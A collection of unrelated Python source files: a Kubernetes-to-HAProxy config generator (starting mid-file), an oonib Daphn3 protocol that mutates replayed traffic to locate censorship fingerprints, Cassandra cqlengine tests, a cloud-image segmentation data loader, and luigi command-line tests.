Run through all files in template_dir and either add their contents (*.conf-files)
or generate them as templates (*.tmpl-files) before adding the result. Its good
practice to prefix the file with digits like 00, 01, 02, etc. to get ordered results.
'''
conf_files = sorted(os.listdir(conf['template_dir']))
gen_data = []
extra = {
'curdate': str(datetime.datetime.now())
}
# Run through all the configs and templates and either add
# them to the config to generate (*.conf files) or render
# them (*.tmpl files).
for hafile in conf_files:
if hafile.endswith('.conf'):
log.debug('Adding plain config {0}'.format(hafile))
with open(os.path.join(conf['template_dir'], hafile), 'r') as cfile:
gen_data += cfile.readlines()
gen_data += '\n'
# if we got a template, pass the data to it and render
elif hafile.endswith('.tmpl'):
log.debug('Adding/Generating template {0}'.format(hafile))
tmpl = j2_map.get_template(hafile)
gen_data += tmpl.render(domains=svc_map, extra=extra)
writeconf(conf, gen_data)
def parse_endpoints(data):
'''
Parse the endpoints and look for services annotated
with our keywords domain and proto. Ignore the others.
'''
svc_retr = {}
log.info('Checking annotations of retrieved endpoints...')
for endp in data['items']:
try:
domain = endp['metadata']['annotations']['domain']
proto = endp['metadata']['annotations']['proto']
ports = endp['subsets'][0]['ports'][0]['port']
svc_retr[domain] = {}
svc_retr[domain]['proto'] = proto
svc_retr[domain]['port'] = ports
for ips in endp['subsets'][0]['addresses']:
if 'ips' in svc_retr[domain]:
svc_retr[domain]['ips'].append(ips['ip'])
else:
svc_retr[domain]['ips'] = []
svc_retr[domain]['ips'].append(ips['ip'])
log.info('Found service {0}'.format(domain))
log.info(
'Endpoints: {0}'.format(
[''.join([x, ':', str(ports)]) for x in svc_retr[domain]['ips']]
)
)
except KeyError:
log.debug(
'Skipping endpoint {0}, no/not matching annotations'.format(
endp['metadata']['name']
)
)
except Exception as perr:
raise SyntaxError('Failed tp parse annotations: {0}'.format(perr))
return svc_retr
def get_endpoints(conf):
'''
Gather endpoints from kubernetes api. If more than one api-server is supplied,
they are tried in order of appearance on the commandline.
'''
if conf['ignore_proxy_env']:
for k in list(os.environ.keys()):
if k.lower().endswith('_proxy'):
del os.environ[k]
for apisrv in conf['apiservers'].split(','):
try:
# switch definition of verify depending on passed
# or missing client certs and verify parameters
if isinstance(conf['ssl_ca_file'], str):
if os.path.isfile(conf['ssl_ca_file']):
verify = conf['ssl_ca_file']
else:
msg = 'Specified ca file {0} does not exist'
raise IOError(msg.format(conf['ssl_ca_file']))
elif isinstance(conf['ssl_ca_file'], bool):
verify = conf['ssl_ca_file']
else:
verify = True
# make the request either with client certs or without
# and server-cert verification or insecure ssl
if conf['ssl_cert_file'] and conf['ssl_key_file']:
if not os.path.isfile(conf['ssl_cert_file']):
msg = 'Specified cert file {0} does not exist'
raise IOError(msg.format(conf['ssl_cert_file']))
if not os.path.isfile(conf['ssl_key_file']):
msg = 'Specified key file {0} does not exist'
raise IOError(msg.format(conf['ssl_key_file']))
msg = 'Getting endpoints from API {0} with SSL-client-certs'
log.info(msg.format(apisrv))
data = requests.get(
apisrv + '/api/v1/endpoints',
cert=(conf['ssl_cert_file'], conf['ssl_key_file']),
verify=verify
)
else:
msg = 'Getting endpoints from API {0} with SSL-verification disabled!'
log.info(msg.format(apisrv))
data = requests.get(
apisrv + '/api/v1/endpoints',
verify=verify
)
if data.status_code != 200:
msg = 'Failed to load endpoints API returned code: {0}:{1}!'
raise ValueError(
msg.format(
data.status_code,
data.text
)
)
else:
msg = 'Successfully received endpoints from api: {0}'
log.info(msg.format(data.status_code))
except Exception as apierr:
msg = 'Failed to load endpoints from API: {0}!'
raise SyntaxError(msg.format(apierr))
try:
k8seps = simplejson.loads(data.text)
return parse_endpoints(k8seps)
except simplejson.scanner.JSONDecodeError as json_err:
msg = 'Failed to parse JSON-response from API: {0}'
raise simplejson.scanner.JSONDecodeError(
msg.format(json_err)
)
def conf_from_env():
env_vars = {
'APISERVERS': '',
'LOGLEVEL': 'INFO',
'SSL_KEY_FILE': '',
'SSL_CERT_FILE': '',
'SSL_CA_FILE': '',
'REFRESH_INTERVAL': 30,
'TEMPLATE_DIR': '/etc/pyconfd',
'HAPROXY_CONF': '/etc/haproxy/haproxy.cfg',
'HAPROXY_CHECK_CMD': '/usr/sbin/haproxy -c -q -f',
'HAPROXY_RELOAD_CMD': '/etc/init.d/haproxy reload',
'IGNORE_PROXY_ENV': True
}
found_vars = {}
for envvar, default in env_vars.items():
found_vars[envvar.lower()] = os.getenv(envvar, default)
return found_vars
if __name__ == '__main__':
if len(sys.argv) <= 1:
args = conf_from_env()
else:
args = vars(ArgParser().parse_args())
log = MyLogger(level=args['loglevel'])
log.debug('Invoked with: {0}'.format(args))
while True:
try:
log.info('#########################################')
log.info('Run started at {0}'.format(str(datetime.datetime.now())))
log.info('#########################################')
j2_env = load_tmpls(args)
svcs = get_endpoints(args)
gen(svc_map=svcs, conf=args, j2_map=j2_env)
log.info('#########################################')
log.info('Run finished at {0}'.format(str(datetime.datetime.now())))
log.info('#########################################')
time.sleep(args['refresh_interval'])
except Exception as run_exc:
log.error('Execution failed: {0}'.format(run_exc))
time.sleep(args['refresh_interval'])
|
|
import sys
import yaml
from twisted.internet import protocol, defer
from twisted.internet.error import ConnectionDone
from oonib import log
def read_pcap(filename):
"""
@param filename: Filesystem path to the pcap.
Returns:
[{"client": "\x17\x52\x15"}, {"server": "\x17\x15\x13"}]
"""
from scapy.all import IP, Raw, rdpcap
packets = rdpcap(filename)
checking_first_packet = True
client_ip_addr = None
server_ip_addr = None
ssl_packets = []
messages = []
"""
pcap assumptions:
pcap only contains packets exchanged between a Tor client and a Tor
server. (This assumption makes sure that there are only two IP addresses
in the pcap file)
The first packet of the pcap is sent from the client to the server. (This
assumption is used to get the IP address of the client.)
All captured packets are TLS packets: that is TCP session
establishment/teardown packets should be filtered out (no SYN/SYN+ACK)
"""
"""
Minimally validate the pcap and also find out what's the client
and server IP addresses.
"""
for packet in packets:
if checking_first_packet:
client_ip_addr = packet[IP].src
checking_first_packet = False
else:
if packet[IP].src != client_ip_addr:
server_ip_addr = packet[IP].src
try:
if (packet[Raw]):
ssl_packets.append(packet)
except IndexError:
pass
"""Form our list."""
for packet in ssl_packets:
if packet[IP].src == client_ip_addr:
messages.append({"client": str(packet[Raw])})
elif packet[IP].src == server_ip_addr:
messages.append({"server": str(packet[Raw])})
else:
raise("Detected third IP address! pcap is corrupted.")
return messages
def read_yaml(filename):
f = open(filename)
obj = yaml.safe_load(f)
f.close()
return obj
class NoInputSpecified(Exception):
pass
class StepError(Exception):
pass
def daphn3MutateString(string, i):
"""
Takes a string and mutates the ith bytes of it.
"""
mutated = ""
for y in range(len(string)):
if y == i:
mutated += chr(ord(string[i]) + 1)
else:
mutated += string[y]
return mutated
def daphn3Mutate(steps, step_idx, mutation_idx):
"""
Take a set of steps and a step index and mutates the step of that
index at the mutation_idx'th byte.
"""
mutated_steps = []
for idx, step in enumerate(steps):
if idx == step_idx:
step_string = step.values()[0]
step_key = step.keys()[0]
mutated_string = daphn3MutateString(step_string,
mutation_idx)
mutated_steps.append({step_key: mutated_string})
else:
mutated_steps.append(step)
return mutated_steps
class Daphn3Protocol(protocol.Protocol):
steps = None
role = "client"
report = None
# We use this index to keep track of where we are in the state machine
current_step = 0
current_data_received = 0
# We use this to keep track of the mutated steps
mutated_steps = None
d = defer.Deferred()
def _current_step_role(self):
return self.steps[self.current_step].keys()[0]
def _current_step_data(self):
step_idx, mutation_idx = self.factory.mutation
log.debug("Mutating %s %s" % (step_idx, mutation_idx))
mutated_step = daphn3Mutate(self.steps,
step_idx, mutation_idx)
log.debug("Mutated packet into %s" % mutated_step)
return mutated_step[self.current_step].values()[0]
def sendPayload(self):
self.debug("Sending payload")
current_step_role = self._current_step_role()
current_step_data = self._current_step_data()
if current_step_role == self.role:
print "In a state to do shit %s" % current_step_data
self.transport.write(current_step_data)
self.nextStep()
else:
print "Not in a state to do anything"
def connectionMade(self):
print "Got connection"
def debug(self, msg):
log.debug("Current step %s" % self.current_step)
log.debug("Current data received %s" % self.current_data_received)
log.debug("Current role %s" % self.role)
log.debug("Current steps %s" % self.steps)
log.debug("Current step data %s" % self._current_step_data())
def nextStep(self):
"""
XXX this method is overwritten individually by client and server transport.
There is probably a smarter way to do this and refactor the common
code into one place, but for the moment like this is good.
"""
pass
def dataReceived(self, data):
current_step_role = self.steps[self.current_step].keys()[0]
log.debug("Current step role %s" % current_step_role)
if current_step_role == self.role:
log.debug("Got a state error!")
raise StepError("I should not have gotten data, while I did, \
perhaps there is something wrong with the state machine?")
self.current_data_received += len(data)
expected_data_in_this_state = len(self.steps[self.current_step].values()[0])
log.debug("Current data received %s" % self.current_data_received)
if self.current_data_received >= expected_data_in_this_state:
self.nextStep()
def nextMutation(self):
log.debug("Moving onto next mutation")
# [step_idx, mutation_idx]
c_step_idx, c_mutation_idx = self.factory.mutation
log.debug("[%s]: c_step_idx: %s | c_mutation_idx: %s" % (self.role,
c_step_idx, c_mutation_idx))
if c_step_idx >= (len(self.steps) - 1):
log.err("No censorship fingerprint bisected.")
log.err("Givinig up.")
self.transport.loseConnection()
return
# This means we have mutated all bytes in the step
# we should proceed to mutating the next step.
log.debug("steps: %s | %s" % (self.steps, self.steps[c_step_idx]))
if c_mutation_idx >= (len(self.steps[c_step_idx].values()[0]) - 1):
log.debug("Finished mutating step")
# increase step
self.factory.mutation[0] += 1
# reset mutation idx
self.factory.mutation[1] = 0
else:
log.debug("Mutating next byte in step")
# increase mutation index
self.factory.mutation[1] += 1
def connectionLost(self, reason):
self.debug("--- Lost the connection ---")
self.nextMutation()
|
|
# Copyright 2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from uuid import uuid4
import random
from datetime import date
from operator import itemgetter
from cassandra.cqlengine import CQLEngineException
from tests.integration.cqlengine.base import BaseCassEngTestCase
from cassandra.cqlengine.management import sync_table
from cassandra.cqlengine.management import drop_table
from cassandra.cqlengine.models import Model
from cassandra.cqlengine import columns
class TestModel(Model):
id = columns.UUID(primary_key=True, default=lambda: uuid4())
count = columns.Integer()
text = columns.Text(required=False)
a_bool = columns.Boolean(default=False)
class TestModelIO(BaseCassEngTestCase):
@classmethod
def setUpClass(cls):
super(TestModelIO, cls).setUpClass()
sync_table(TestModel)
@classmethod
def tearDownClass(cls):
super(TestModelIO, cls).tearDownClass()
drop_table(TestModel)
def test_model_save_and_load(self):
"""
Tests that models can be saved and retrieved
"""
tm = TestModel.create(count=8, text='123456789')
self.assertIsInstance(tm, TestModel)
tm2 = TestModel.objects(id=tm.pk).first()
self.assertIsInstance(tm2, TestModel)
for cname in tm._columns.keys():
self.assertEqual(getattr(tm, cname), getattr(tm2, cname))
def test_model_read_as_dict(self):
"""
Tests that columns of an instance can be read as a dict.
"""
tm = TestModel.create(count=8, text='123456789', a_bool=True)
column_dict = {
'id': tm.id,
'count': tm.count,
'text': tm.text,
'a_bool': tm.a_bool,
}
self.assertEqual(sorted(tm.keys()), sorted(column_dict.keys()))
self.assertItemsEqual(tm.values(), column_dict.values())
self.assertEqual(
sorted(tm.items(), key=itemgetter(0)),
sorted(column_dict.items(), key=itemgetter(0)))
self.assertEqual(len(tm), len(column_dict))
for column_id in column_dict.keys():
self.assertEqual(tm[column_id], column_dict[column_id])
tm['count'] = 6
self.assertEqual(tm.count, 6)
def test_model_updating_works_properly(self):
"""
Tests that subsequent saves after initial model creation work
"""
tm = TestModel.objects.create(count=8, text='123456789')
tm.count = 100
tm.a_bool = True
tm.save()
tm2 = TestModel.objects(id=tm.pk).first()
self.assertEqual(tm.count, tm2.count)
self.assertEqual(tm.a_bool, tm2.a_bool)
def test_model_deleting_works_properly(self):
"""
Tests that an instance's delete method deletes the instance
"""
tm = TestModel.create(count=8, text='123456789')
tm.delete()
tm2 = TestModel.objects(id=tm.pk).first()
self.assertIsNone(tm2)
def test_column_deleting_works_properly(self):
"""
"""
tm = TestModel.create(count=8, text='123456789')
tm.text = None
tm.save()
tm2 = TestModel.objects(id=tm.pk).first()
self.assertIsInstance(tm2, TestModel)
assert tm2.text is None
assert tm2._values['text'].previous_value is None
def test_a_sensical_error_is_raised_if_you_try_to_create_a_table_twice(self):
"""
"""
sync_table(TestModel)
sync_table(TestModel)
class TestMultiKeyModel(Model):
partition = columns.Integer(primary_key=True)
cluster = columns.Integer(primary_key=True)
count = columns.Integer(required=False)
text = columns.Text(required=False)
class TestDeleting(BaseCassEngTestCase):
@classmethod
def setUpClass(cls):
super(TestDeleting, cls).setUpClass()
drop_table(TestMultiKeyModel)
sync_table(TestMultiKeyModel)
@classmethod
def tearDownClass(cls):
super(TestDeleting, cls).tearDownClass()
drop_table(TestMultiKeyModel)
def test_deleting_only_deletes_one_object(self):
partition = random.randint(0, 1000)
for i in range(5):
TestMultiKeyModel.create(partition=partition, cluster=i, count=i, text=str(i))
assert TestMultiKeyModel.filter(partition=partition).count() == 5
TestMultiKeyModel.get(partition=partition, cluster=0).delete()
assert TestMultiKeyModel.filter(partition=partition).count() == 4
TestMultiKeyModel.filter(partition=partition).delete()
class TestUpdating(BaseCassEngTestCase):
@classmethod
def setUpClass(cls):
super(TestUpdating, cls).setUpClass()
drop_table(TestMultiKeyModel)
sync_table(TestMultiKeyModel)
@classmethod
def tearDownClass(cls):
super(TestUpdating, cls).tearDownClass()
drop_table(TestMultiKeyModel)
def setUp(self):
super(TestUpdating, self).setUp()
self.instance = TestMultiKeyModel.create(
partition=random.randint(0, 1000),
cluster=random.randint(0, 1000),
count=0,
text='happy'
)
def test_vanilla_update(self):
self.instance.count = 5
self.instance.save()
check = TestMultiKeyModel.get(partition=self.instance.partition, cluster=self.instance.cluster)
assert check.count == 5
assert check.text == 'happy'
def test_deleting_only(self):
self.instance.count = None
self.instance.text = None
self.instance.save()
check = TestMultiKeyModel.get(partition=self.instance.partition, cluster=self.instance.cluster)
assert check.count is None
assert check.text is None
def test_get_changed_columns(self):
assert self.instance.get_changed_columns() == []
self.instance.count = 1
changes = self.instance.get_changed_columns()
assert len(changes) == 1
assert changes == ['count']
self.instance.save()
assert self.instance.get_changed_columns() == []
class TestCanUpdate(BaseCassEngTestCase):
@classmethod
def setUpClass(cls):
super(TestCanUpdate, cls).setUpClass()
drop_table(TestModel)
sync_table(TestModel)
@classmethod
def tearDownClass(cls):
super(TestCanUpdate, cls).tearDownClass()
drop_table(TestModel)
def test_success_case(self):
tm = TestModel(count=8, text='123456789')
# object hasn't been saved,
# shouldn't be able to update
assert not tm._is_persisted
assert not tm._can_update()
tm.save()
# object has been saved,
# should be able to update
assert tm._is_persisted
assert tm._can_update()
tm.count = 200
# primary keys haven't changed,
# should still be able to update
assert tm._can_update()
tm.save()
tm.id = uuid4()
# primary keys have changed,
# should not be able to update
assert not tm._can_update()
class IndexDefinitionModel(Model):
key = columns.UUID(primary_key=True)
val = columns.Text(index=True)
class TestIndexedColumnDefinition(BaseCassEngTestCase):
def test_exception_isnt_raised_if_an_index_is_defined_more_than_once(self):
sync_table(IndexDefinitionModel)
sync_table(IndexDefinitionModel)
class ReservedWordModel(Model):
token = columns.Text(primary_key=True)
insert = columns.Integer(index=True)
class TestQueryQuoting(BaseCassEngTestCase):
def test_reserved_cql_words_can_be_used_as_column_names(self):
"""
"""
sync_table(ReservedWordModel)
model1 = ReservedWordModel.create(token='1', insert=5)
model2 = ReservedWordModel.filter(token='1')
assert len(model2) == 1
assert model1.token == model2[0].token
assert model1.insert == model2[0].insert
class TestQueryModel(Model):
test_id = columns.UUID(primary_key=True, default=uuid4)
date = columns.Date(primary_key=True)
description = columns.Text()
class TestQuerying(BaseCassEngTestCase):
@classmethod
def setUpClass(cls):
super(TestQuerying, cls).setUpClass()
drop_table(TestQueryModel)
sync_table(TestQueryModel)
@classmethod
def tearDownClass(cls):
super(TestQuerying, cls).tearDownClass()
drop_table(TestQueryModel)
def test_query_with_date(self):
uid = uuid4()
day = date(2013, 11, 26)
obj = TestQueryModel.create(test_id=uid, date=day, description=u'foo')
self.assertEqual(obj.description, u'foo')
inst = TestQueryModel.filter(
TestQueryModel.test_id == uid,
TestQueryModel.date == day).limit(1).first()
assert inst.test_id == uid
assert inst.date == day
def test_none_filter_fails():
class NoneFilterModel(Model):
pk = columns.Integer(primary_key=True)
v = columns.Integer()
sync_table(NoneFilterModel)
try:
NoneFilterModel.objects(pk=None)
raise Exception("fail")
except CQLEngineException as e:
pass
|
|
import os
import cv2
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from torch.utils.data import DataLoader, Dataset
import albumentations as albu
import warnings
from augs import (
get_training_augmentation,
get_validation_augmentation,
get_preprocessing,
)
warnings.filterwarnings("once")
def get_img(x: str = "img_name", folder: str = "train_images"):
"""
Return image based on image name and folder.
Args:
x: image name
folder: folder with images
Returns:
"""
image_path = os.path.join(folder, x)
img = cv2.imread(image_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
return img
def rle_decode(mask_rle: str = "", shape: tuple = (1400, 2100)):
"""
Decode rle encoded mask.
Args:
mask_rle: encoded mask
shape: final shape
Returns:
"""
s = mask_rle.split()
starts, lengths = [np.asarray(x, dtype=int) for x in (s[0:][::2], s[1:][::2])]
starts -= 1
ends = starts + lengths
img = np.zeros(shape[0] * shape[1], dtype=np.uint8)
for lo, hi in zip(starts, ends):
img[lo:hi] = 1
return img.reshape(shape, order="F")
def make_mask(
df: pd.DataFrame, image_name: str = "img.jpg", shape: tuple = (1400, 2100)
):
"""
Create mask based on df, image name and shape.
Args:
df: dataframe with cloud dataset
image_name: image name
shape: final shape
Returns:
"""
encoded_masks = df.loc[df["im_id"] == image_name, "EncodedPixels"]
masks = np.zeros((shape[0], shape[1], 4), dtype=np.float32)
for idx, label in enumerate(encoded_masks.values):
if label is not np.nan:
mask = rle_decode(label)
masks[:, :, idx] = mask
return masks
def mask2rle(img):
"""
Convert mask to rle.
Args:
img:
Returns:
"""
pixels = img.T.flatten()
pixels = np.concatenate([[0], pixels, [0]])
runs = np.where(pixels[1:] != pixels[:-1])[0] + 1
runs[1::2] -= runs[::2]
return " ".join(str(x) for x in runs)
class CloudDataset(Dataset):
def __init__(
self,
path: str = "",
df: pd.DataFrame = None,
datatype: str = "train",
img_ids: np.array = None,
transforms=albu.Compose([albu.HorizontalFlip()]),
preprocessing=None,
preload: bool = False,
image_size: tuple = (320, 640),
augmentation: str = "default",
filter_bad_images: bool = False,
):
"""
Args:
path: path to data
df: dataframe with data
datatype: train|valid|test
img_ids: list of imagee ids
transforms: albumentation transforms
preprocessing: preprocessing if necessary
preload: whether to preload data
image_size: image size for resizing
augmentation: name of augmentation settings
filter_bad_images: to filter out bad images
"""
self.df = df
self.path = path
self.datatype = datatype if datatype == "test" else "train"
if self.datatype != "test":
self.data_folder = f"{path}/train_images"
else:
self.data_folder = f"{path}/test_images"
self.img_ids = img_ids
# list of bad images from discussions
self.bad_imgs = [
"046586a.jpg",
"1588d4c.jpg",
"1e40a05.jpg",
"41f92e5.jpg",
"449b792.jpg",
"563fc48.jpg",
"8bd81ce.jpg",
"c0306e5.jpg",
"c26c635.jpg",
"e04fea3.jpg",
"e5f2f24.jpg",
"eda52f2.jpg",
"fa645da.jpg",
]
if filter_bad_images:
self.img_ids = [i for i in self.img_ids if i not in self.bad_imgs]
self.transforms = transforms
self.preprocessing = preprocessing
self.augmentation = augmentation
self.dir_name = (
f"{self.path}/preload_{augmentation}_{image_size[0]}_{image_size[1]}"
)
self.preload = preload
self.preloaded = False
if self.preload:
self.save_processed_()
self.preloaded = True
def save_processed_(self):
"""
Saves train images with augmentations, to speed up training.
Returns:
"""
os.makedirs(self.dir_name, exist_ok=True)
self.dir_name += f"/{self.datatype}"
if not os.path.exists(self.dir_name):
os.makedirs(self.dir_name)
for i, e in enumerate(self.img_ids):
img, mask = self.__getitem__(i)
np.save(f"{self.dir_name}/{e}_mask.npy", mask)
np.save(f"{self.dir_name}/{e}_img.npy", img)
def __getitem__(self, idx):
image_name = self.img_ids[idx]
if self.preloaded and self.datatype != "valid":
img = np.load(f"{self.dir_name}/{image_name}_img.npy")
mask = np.load(f"{self.dir_name}/{image_name}_mask.npy")
else:
mask = make_mask(self.df, image_name)
image_path = os.path.join(self.data_folder, image_name)
img = cv2.imread(image_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
augmented = self.transforms(image=img, mask=mask)
img = augmented["image"]
mask = augmented["mask"]
if self.preprocessing:
preprocessed = self.preprocessing(image=img, mask=mask)
img = preprocessed["image"]
mask = preprocessed["mask"]
return img, mask
def __len__(self):
return len(self.img_ids)
class CloudDatasetClassification(Dataset):
def __init__(
self,
path: str = "",
df: pd.DataFrame = None,
datatype: str = "train",
img_ids: np.array = None,
transforms=albu.Compose([albu.HorizontalFlip()]),
preprocessing=None,
preload: bool = False,
image_size: tuple = (320, 640),
augmentation: str = "default",
one_hot_labels: dict = None,
filter_bad_images: bool = False,
):
"""
Args:
path: path to data
df: dataframe with data
datatype: train|valid|test
img_ids: list of imagee ids
transforms: albumentation transforms
preprocessing: preprocessing if necessary
preload: whether to preload data
image_size: image size for resizing
augmentation: name of augmentation settings
one_hot_labels: dictionary with labels for images
filter_bad_images: to filter out bad images
"""
self.df = df
self.path = path
self.datatype = datatype if datatype == "test" else "train"
if self.datatype != "test":
self.data_folder = f"{path}/train_images"
else:
self.data_folder = f"{path}/test_images"
self.img_ids = img_ids
self.bad_imgs = [
"046586a.jpg",
"1588d4c.jpg",
"1e40a05.jpg",
"41f92e5.jpg",
"449b792.jpg",
"563fc48.jpg",
"8bd81ce.jpg",
"c0306e5.jpg",
"c26c635.jpg",
"e04fea3.jpg",
"e5f2f24.jpg",
"eda52f2.jpg",
"fa645da.jpg",
]
if filter_bad_images:
self.img_ids = [i for i in self.img_ids if i not in self.bad_imgs]
self.transforms = transforms
self.preprocessing = preprocessing
self.augmentation = augmentation
self.dir_name = (
f"{self.path}/preload_{augmentation}_{image_size[0]}_{image_size[1]}"
)
self.one_hot_labels = one_hot_labels
self.preload = preload
self.preloaded = False
if self.preload:
self.save_processed_()
self.preloaded = True
def save_processed_(self):
os.makedirs(self.dir_name, exist_ok=True)
self.dir_name += f"/{self.datatype}"
if not os.path.exists(self.dir_name):
os.makedirs(self.dir_name)
for i, e in enumerate(self.img_ids):
img, mask = self.__getitem__(i)
np.save(f"{self.dir_name}/{e}_img.npy", img)
def __getitem__(self, idx):
image_name = self.img_ids[idx]
if self.preloaded and self.datatype != "valid":
img = np.load(f"{self.dir_name}/{image_name}_img.npy")
else:
image_path = os.path.join(self.data_folder, image_name)
img = cv2.imread(image_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
augmented = self.transforms(image=img)
img = augmented["image"]
if self.preprocessing:
preprocessed = self.preprocessing(image=img)
img = preprocessed["image"]
label = self.one_hot_labels[image_name]
return img, label
def __len__(self):
return len(self.img_ids)
def prepare_loaders(
path: str = "",
bs: int = 4,
num_workers: int = 0,
preprocessing_fn=None,
preload: bool = False,
image_size: tuple = (320, 640),
augmentation: str = "default",
task: str = "segmentation",
):
"""
Prepare dataloaders for catalyst.
At first reads dataframe with the data and prepares it to be used in dataloaders.
Creates dataloaders and returns them.
Args:
path: path to data
bs: batch size
num_workers: number of workers
preprocessing_fn: preprocessing
preload: whether to save augmented data on disk
image_size: image size to resize
augmentation: augmentation name
task: segmentation or classification
Returns:
"""
train = pd.read_csv(f"{path}/train.csv")
train["label"] = train["Image_Label"].apply(lambda x: x.split("_")[1])
train["im_id"] = train["Image_Label"].apply(lambda x: x.split("_")[0])
id_mask_count = (
train.loc[~train["EncodedPixels"].isnull(), "Image_Label"]
.apply(lambda x: x.split("_")[0])
.value_counts()
.reset_index()
.rename(columns={"index": "img_id", "Image_Label": "count"})
)
train_ids, valid_ids = train_test_split(
id_mask_count["img_id"].values,
random_state=42,
shuffle=True,
# stratify=id_mask_count['count'],
test_size=0.1,
)
if task == "classification":
train_df = train[~train["EncodedPixels"].isnull()]
classes = train_df["label"].unique()
train_df = train_df.groupby("im_id")["label"].agg(set).reset_index()
for class_name in classes:
train_df[class_name] = train_df["label"].map(
lambda x: 1 if class_name in x else 0
)
img_2_ohe_vector = {
img: np.float32(vec)
for img, vec in zip(train_df["im_id"], train_df.iloc[:, 2:].values)
}
sub = pd.read_csv(f"{path}/sample_submission.csv")
sub["label"] = sub["Image_Label"].apply(lambda x: x.split("_")[1])
sub["im_id"] = sub["Image_Label"].apply(lambda x: x.split("_")[0])
test_ids = (
sub["Image_Label"].apply(lambda x: x.split("_")[0]).drop_duplicates().values
)
if task == "segmentation":
if preload:
_ = CloudDataset(
path=path,
df=train,
datatype="train",
img_ids=id_mask_count["img_id"].values,
transforms=get_training_augmentation(
augmentation=augmentation, image_size=image_size
),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
)
train_dataset = CloudDataset(
path=path,
df=train,
datatype="train",
img_ids=train_ids,
transforms=get_training_augmentation(
augmentation=augmentation, image_size=image_size
),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
)
valid_dataset = CloudDataset(
path=path,
df=train,
datatype="valid",
img_ids=valid_ids,
transforms=get_validation_augmentation(image_size=image_size),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
)
elif task == "classification":
if preload:
_ = CloudDatasetClassification(
path=path,
df=train,
datatype="train",
img_ids=id_mask_count["img_id"].values,
transforms=get_training_augmentation(
augmentation=augmentation, image_size=image_size
),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
one_hot_labels=img_2_ohe_vector,
)
train_dataset = CloudDatasetClassification(
path=path,
df=train,
datatype="train",
img_ids=train_ids,
transforms=get_training_augmentation(
augmentation=augmentation, image_size=image_size
),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
one_hot_labels=img_2_ohe_vector,
)
valid_dataset = CloudDatasetClassification(
path=path,
df=train,
datatype="valid",
img_ids=valid_ids,
transforms=get_validation_augmentation(image_size=image_size),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
one_hot_labels=img_2_ohe_vector,
)
train_loader = DataLoader(
train_dataset,
batch_size=bs,
shuffle=True,
num_workers=num_workers,
pin_memory=True,
)
valid_loader = DataLoader(
valid_dataset,
batch_size=bs,
shuffle=False,
num_workers=num_workers,
pin_memory=True,
)
test_dataset = CloudDataset(
path=path,
df=sub,
datatype="test",
img_ids=test_ids,
transforms=get_validation_augmentation(image_size=image_size),
preprocessing=get_preprocessing(preprocessing_fn),
preload=preload,
image_size=(320, 640),
)
test_loader = DataLoader(
test_dataset,
batch_size=bs // 2,
shuffle=False,
num_workers=num_workers,
pin_memory=True,
)
loaders = {"train": train_loader, "valid": valid_loader, "test": test_loader}
return loaders
|
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import logging
import mock
import os
import subprocess
from helpers import unittest
import warnings
from luigi import six
import luigi
from luigi.mock import MockTarget
class SomeTask(luigi.Task):
n = luigi.IntParameter()
def output(self):
return MockTarget('/tmp/test_%d' % self.n)
def run(self):
f = self.output().open('w')
f.write('done')
f.close()
class AmbiguousClass(luigi.Task):
pass
class AmbiguousClass(luigi.Task):
pass
class TaskWithSameName(luigi.Task):
def run(self):
self.x = 42
class TaskWithSameName(luigi.Task):
# there should be no ambiguity
def run(self):
self.x = 43
class WriteToFile(luigi.Task):
filename = luigi.Parameter()
def output(self):
return luigi.LocalTarget(self.filename)
def run(self):
f = self.output().open('w')
print('foo', file=f)
f.close()
class FooBaseClass(luigi.Task):
x = luigi.Parameter(default='foo_base_default')
class FooSubClass(FooBaseClass):
pass
class CmdlineTest(unittest.TestCase):
def setUp(self):
MockTarget.fs.clear()
@mock.patch("logging.getLogger")
def test_cmdline_main_task_cls(self, logger):
luigi.run(['--local-scheduler', '--no-lock', '--n', '100'], main_task_cls=SomeTask)
self.assertEqual(dict(MockTarget.fs.get_all_data()), {'/tmp/test_100': b'done'})
@mock.patch("logging.getLogger")
def test_cmdline_local_scheduler(self, logger):
luigi.run(['SomeTask', '--no-lock', '--n', '101'], local_scheduler=True)
self.assertEqual(dict(MockTarget.fs.get_all_data()), {'/tmp/test_101': b'done'})
@mock.patch("logging.getLogger")
def test_cmdline_other_task(self, logger):
luigi.run(['--local-scheduler', '--no-lock', 'SomeTask', '--n', '1000'])
self.assertEqual(dict(MockTarget.fs.get_all_data()), {'/tmp/test_1000': b'done'})
@mock.patch("logging.getLogger")
def test_cmdline_ambiguous_class(self, logger):
self.assertRaises(Exception, luigi.run, ['--local-scheduler', '--no-lock', 'AmbiguousClass'])
@mock.patch("logging.getLogger")
@mock.patch("logging.StreamHandler")
def test_setup_interface_logging(self, handler, logger):
handler.return_value = mock.Mock(name="stream_handler")
with mock.patch("luigi.interface.setup_interface_logging.has_run", new=False):
luigi.interface.setup_interface_logging()
self.assertEqual([mock.call(handler.return_value)], logger.return_value.addHandler.call_args_list)
